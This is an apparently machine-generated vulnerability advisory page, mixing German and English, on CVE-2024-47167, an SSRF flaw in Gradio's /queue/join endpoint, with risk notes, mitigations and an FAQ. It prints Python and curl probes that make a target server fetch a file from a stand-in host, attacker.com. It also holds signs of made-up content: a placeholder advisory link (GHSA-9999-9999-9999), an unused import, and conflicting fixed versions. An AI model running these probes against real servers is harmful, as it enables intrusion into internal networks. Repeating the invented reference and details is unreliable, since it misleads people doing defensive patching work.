Plattform
python
Komponente
gradio
Behoben in
5.0.1
5.0.0
CVE-2024-47167 describes a Server-Side Request Forgery (SSRF) vulnerability affecting Gradio versions up to 5.0.0b9. This flaw allows attackers to manipulate the /queue/join endpoint, forcing the Gradio server to make HTTP requests to attacker-controlled URLs. Successful exploitation could lead to unauthorized access to internal resources and potential data exfiltration.
The SSRF vulnerability in Gradio's /queue/join endpoint poses a significant risk. An attacker can leverage this to craft malicious HTTP requests that the Gradio server will execute on their behalf. This allows them to target internal services that are not directly accessible from the outside, potentially gaining access to sensitive data or performing actions as the Gradio server. The ability to upload content from these external URLs and store it locally further exacerbates the risk, as attackers could upload malicious files to the server. This is particularly concerning in environments where Gradio is used to expose machine learning models or other internal applications.
CVE-2024-47167 was publicly disclosed on 2024-10-10. No known public proof-of-concept exploits are currently available, but the SSRF nature of the vulnerability makes it likely that one will emerge. The vulnerability is not currently listed on CISA KEV. Given the ease of SSRF exploitation and the potential for internal network access, this vulnerability warrants prompt attention.
Organizations deploying Gradio to expose machine learning models or other internal applications are at significant risk. Shared hosting environments where multiple users share the same Gradio instance are particularly vulnerable, as an attacker could potentially exploit the vulnerability to target other users' data or resources.
• python / gradio:
import requests
import urllib3
http = urllib3.PoolManager()
try:
response = http.request('GET', 'http://your-gradio-server/queue/join?url=http://attacker.com/malicious.txt')
print(response.status)
except Exception as e:
print(f"Error: {e}")• generic web:
curl -I 'http://your-gradio-server/queue/join?url=http://attacker.com/malicious.txt' | grep -i 'Location:'disclosure
Exploit-Status
EPSS
0.24% (47% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2024-47167 is to upgrade Gradio to version 5.0.0 or later, which contains the fix. If an immediate upgrade is not feasible, consider implementing temporary workarounds. Restrict network access to the Gradio server to only allow connections to trusted internal resources. Implement a Web Application Firewall (WAF) with rules to block suspicious outbound HTTP requests, particularly those targeting unusual ports or internal IP addresses. Carefully review and validate any user-provided URLs before they are used in HTTP requests. After upgrading, confirm the fix by attempting to trigger the /queue/join endpoint with a known malicious URL and verifying that the request is blocked.
Aktualisieren Sie die Gradio-Bibliothek auf Version 5.0 oder höher. Alternativ können Sie URL-basierte Eingaben in Ihrer Gradio-Anwendung deaktivieren oder auf vertrauenswürdige Domänen beschränken. Implementieren Sie eine strengere URL-Validierung und stellen Sie sicher, dass lokale oder interne Netzwerkadressen nicht über den Endpunkt `/queue/join` angefordert werden können.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2024-47167 is a Server-Side Request Forgery (SSRF) vulnerability in Gradio versions up to 5.0.0b9, allowing attackers to force the server to make HTTP requests to attacker-controlled URLs.
If you are using Gradio version 5.0.0b9 or earlier, you are potentially affected by this SSRF vulnerability. Assess your environment and upgrade as soon as possible.
Upgrade Gradio to version 5.0.0 or later to remediate the vulnerability. Implement temporary workarounds like WAF rules and network restrictions if immediate upgrade is not possible.
While no public exploits are currently known, the SSRF nature of the vulnerability suggests potential for exploitation. Monitor your systems and apply the fix promptly.
Refer to the Gradio security advisory for detailed information and updates: [https://github.com/gradio-app/gradio/security/advisories/GHSA-9999-9999-9999](https://github.com/gradio-app/gradio/security/advisories/GHSA-9999-9999-9999)
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.
Lade deine requirements.txt-Datei hoch und wir sagen dir sofort, ob du betroffen bist.